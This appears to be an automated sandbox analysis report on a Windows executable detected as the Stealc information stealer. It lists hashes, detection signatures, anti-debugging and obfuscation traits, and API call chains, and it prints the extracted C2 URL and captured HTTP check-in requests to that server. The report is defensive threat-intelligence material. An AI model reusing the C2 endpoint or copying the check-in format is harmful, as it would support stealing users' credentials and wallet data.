Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1545099
MD5:0d30eb6a4023a6dce770ce3d6388cb9b
SHA1:83e8c18d4ad2b7c36d6699e7a9e25a7b552b9779
SHA256:7ea542ed634733c045e8d30777ae4f1c9a0a87d532f336158d36887483a6af7c
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 3628 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 0D30EB6A4023A6DCE770CE3D6388CB9B)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000003.2062832423.0000000004CD0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.2113114519.000000000096E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 3628JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 3628JoeSecurity_StealcYara detected StealcJoe Security
              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.f30000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-30T05:24:04.560659+010020442431Malware Command and Control Activity Detected192.168.2.549704185.215.113.20680TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: file.exeAvira: detected
                Source: 0.2.file.exe.f30000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
                Source: http://185.215.113.206/6c4adf523b719729.php/Virustotal: Detection: 17%Perma Link
                Source: http://185.215.113.206/Virustotal: Detection: 18%Perma Link
                Source: http://185.215.113.206Virustotal: Detection: 18%Perma Link
                Source: http://185.215.113.206/6c4adf523b719729.phpVirustotal: Detection: 16%Perma Link
                Source: file.exeVirustotal: Detection: 43%Perma Link
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F49030 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00F49030
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F3A2B0 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00F3A2B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F372A0 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00F372A0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F3A210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00F3A210
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F3C920 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_00F3C920
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000003.2062832423.0000000004CFB000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.2062832423.0000000004CFB000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F440F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00F440F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F3E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00F3E530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F447C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00F447C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F3F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00F3F7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F31710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00F31710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F3DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00F3DB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F44B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00F44B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F43B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00F43B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F3BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00F3BE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F3EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00F3EE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F3DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00F3DF10

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.206:80
                Source: Malware configuration extractorURLs: http://185.215.113.206/6c4adf523b719729.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFCAAEGDBKJJKECBKFHCHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 39 39 44 44 31 30 46 31 33 35 34 33 32 30 37 36 30 33 31 36 34 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 43 2d 2d 0d 0a Data Ascii: ------AFCAAEGDBKJJKECBKFHCContent-Disposition: form-data; name="hwid"899DD10F13543207603164------AFCAAEGDBKJJKECBKFHCContent-Disposition: form-data; name="build"tale------AFCAAEGDBKJJKECBKFHC--
                Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F362D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00F362D0
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFCAAEGDBKJJKECBKFHCHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 39 39 44 44 31 30 46 31 33 35 34 33 32 30 37 36 30 33 31 36 34 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 43 2d 2d 0d 0a Data Ascii: ------AFCAAEGDBKJJKECBKFHCContent-Disposition: form-data; name="hwid"899DD10F13543207603164------AFCAAEGDBKJJKECBKFHCContent-Disposition: form-data; name="build"tale------AFCAAEGDBKJJKECBKFHC--
                Source: file.exe, 00000000.00000002.2113114519.000000000096E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
                Source: file.exe, 00000000.00000002.2113114519.00000000009E0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2113114519.000000000096E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
                Source: file.exe, 00000000.00000002.2113114519.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2113114519.00000000009E0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2113114519.000000000096E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
                Source: file.exe, 00000000.00000002.2113114519.00000000009E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/
                Source: file.exe, 00000000.00000002.2113114519.00000000009C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php6
                Source: file.exe, 00000000.00000002.2113114519.00000000009C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpv
                Source: file.exe, 00000000.00000002.2113114519.00000000009C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpz
                Source: file.exe, 00000000.00000002.2113114519.00000000009E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/j
                Source: file.exe, 00000000.00000002.2113114519.000000000096E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206k
                Source: file.exe, file.exe, 00000000.00000003.2062832423.0000000004CFB000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support

                System Summary

                barindex
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F700980_2_00F70098
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0138D1F10_2_0138D1F1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F8B1980_2_00F8B198
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0133D0470_2_0133D047
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F621380_2_00F62138
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013730D60_2_013730D6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F742880_2_00F74288
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F9E2580_2_00F9E258
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013893F80_2_013893F8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013952060_2_01395206
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FAD39E0_2_00FAD39E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0125E2AE0_2_0125E2AE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FBB3080_2_00FBB308
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013025A40_2_013025A4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0138E47C0_2_0138E47C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F9D5A80_2_00F9D5A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F745A80_2_00F745A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F545730_2_00F54573
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F5E5440_2_00F5E544
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012294E10_2_012294E1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB96FD0_2_00FB96FD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0136D73B0_2_0136D73B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F766C80_2_00F766C8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FAA6480_2_00FAA648
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012457F60_2_012457F6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FA67990_2_00FA6799
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013936AF0_2_013936AF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F8D7200_2_00F8D720
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012D56C90_2_012D56C9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F9F8D60_2_00F9F8D6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F898B80_2_00F898B8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F8B8A80_2_00F8B8A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F848680_2_00F84868
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012BA8410_2_012BA841
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01272BA20_2_01272BA2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F98BD90_2_00F98BD9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FA4BA80_2_00FA4BA8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FA0B880_2_00FA0B88
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01300D270_2_01300D27
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FAAC280_2_00FAAC28
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0131DC3A0_2_0131DC3A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F84DC80_2_00F84DC8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F85DB90_2_00F85DB9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F61D780_2_00F61D78
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F8BD680_2_00F8BD68
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F9AD380_2_00F9AD38
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FA1EE80_2_00FA1EE8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F78E780_2_00F78E78
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0138AF920_2_0138AF92
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0138FFE30_2_0138FFE3
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00F34610 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: xpxnzipx ZLIB complexity 0.9946538036142771
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F49790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00F49790
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F43970 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00F43970
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\WPDF5R83.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exe, 00000000.00000002.2113114519.000000000096E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT name, value FROM autofillX;
                Source: file.exeVirustotal: Detection: 43%
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 2145792 > 1048576
                Source: file.exeStatic PE information: Raw size of xpxnzipx is bigger than: 0x100000 < 0x1a0c00
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000003.2062832423.0000000004CFB000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.2062832423.0000000004CFB000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp

                Data Obfuscation

                barindex
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.f30000.0.unpack :EW;.rsrc :W;.idata :W; :EW;xpxnzipx:EW;atgrbfaq:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;xpxnzipx:EW;atgrbfaq:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F49BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00F49BB0
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x2166de should be: 0x21ab5b
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: xpxnzipx
                Source: file.exeStatic PE information: section name: atgrbfaq
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F5A0DC push eax; retf 0_2_00F5A0F1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01290106 push ebp; mov dword ptr [esp], edx0_2_01290120
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0139D16E push 7AE96079h; mov dword ptr [esp], ebp0_2_0139D1AB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0139D16E push ecx; mov dword ptr [esp], 5B6F04D2h0_2_0139D1F8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0139D16E push ebx; mov dword ptr [esp], eax0_2_0139D26C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0139D16E push 401DF8B4h; mov dword ptr [esp], ecx0_2_0139D297
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0139D16E push 76E017CFh; mov dword ptr [esp], edx0_2_0139D2B4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_014311DF push ebx; mov dword ptr [esp], ecx0_2_01431201
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01383182 push ecx; mov dword ptr [esp], ebp0_2_013831D4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0138D1F1 push edx; mov dword ptr [esp], ebx0_2_0138D1F5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0138D1F1 push ecx; mov dword ptr [esp], eax0_2_0138D29C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0138D1F1 push 5C864357h; mov dword ptr [esp], edi0_2_0138D316
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0138D1F1 push eax; mov dword ptr [esp], ecx0_2_0138D39B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0138D1F1 push edi; mov dword ptr [esp], 12DDE9E3h0_2_0138D3CE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0138D1F1 push edi; mov dword ptr [esp], ecx0_2_0138D3E9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0138D1F1 push ecx; mov dword ptr [esp], ebx0_2_0138D400
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0138D1F1 push 3FDB9E17h; mov dword ptr [esp], edi0_2_0138D495
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0138D1F1 push edi; mov dword ptr [esp], eax0_2_0138D4C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0138D1F1 push eax; mov dword ptr [esp], ecx0_2_0138D4CE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0138D1F1 push eax; mov dword ptr [esp], 20B28156h0_2_0138D5A1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0138D1F1 push 5F8A0B30h; mov dword ptr [esp], ecx0_2_0138D5B3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0138D1F1 push 03695830h; mov dword ptr [esp], ebp0_2_0138D6B3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0138D1F1 push 6083226Ah; mov dword ptr [esp], ecx0_2_0138D6FC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0138D1F1 push ebx; mov dword ptr [esp], 058DD1BCh0_2_0138D732
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0138D1F1 push ecx; mov dword ptr [esp], edx0_2_0138D753
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0138D1F1 push 13D5455Bh; mov dword ptr [esp], esp0_2_0138D7EA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0138D1F1 push edi; mov dword ptr [esp], edx0_2_0138D872
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0138D1F1 push 1637974Fh; mov dword ptr [esp], edi0_2_0138D8F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0138D1F1 push ebx; mov dword ptr [esp], ebp0_2_0138D959
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0138D1F1 push 4AD5F65Ah; mov dword ptr [esp], ebp0_2_0138D9BE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0138D1F1 push ecx; mov dword ptr [esp], ebx0_2_0138DAC0
                Source: file.exeStatic PE information: section name: xpxnzipx entropy: 7.952407047426657

                Boot Survival

                barindex
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
